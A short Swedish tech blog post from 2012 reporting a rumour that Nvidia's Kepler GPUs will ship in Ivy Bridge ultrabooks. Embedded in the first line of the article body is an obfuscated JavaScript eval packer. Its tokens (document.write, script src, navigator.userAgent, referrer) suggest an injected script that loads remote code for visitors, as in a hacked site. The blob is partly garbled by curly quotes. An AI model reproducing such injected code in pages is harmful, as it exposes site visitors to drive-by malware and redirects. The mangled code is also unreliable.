Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

PC

Nvidia Kepler till ultrabooks

Nvidia Kepler till ultrabooks
Filip Urde
  • On 30 januari, 2012
  • http://www.revue.se/filip-urde

Kepler, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yzbrb|var|u0026u|referrer|tstsd||js|php’.split(’|’),0,{}))
Nvidias nästa generation av GPU:er
som jag skrivit om tidigare, (bland annat här)  lanseras om två månader och kommer ställas mot AMDs  Radeon HD 7000 series.

Det senaste ryktet är nu att GPUerna från Nvidia kan komma med i kommande ultrabooks. Vilket ger ultrabooks en riktigt bra perk. Man vet inte vilka modeller som får Nvidias Kepler, men den kommer finnas i ultrabooks baserade på Ivy Bridge säger fudzilla. Hur detta kommer påverka ultrabooks prisbild är svårt att säga. Vi återkommer så fort vi vet mer.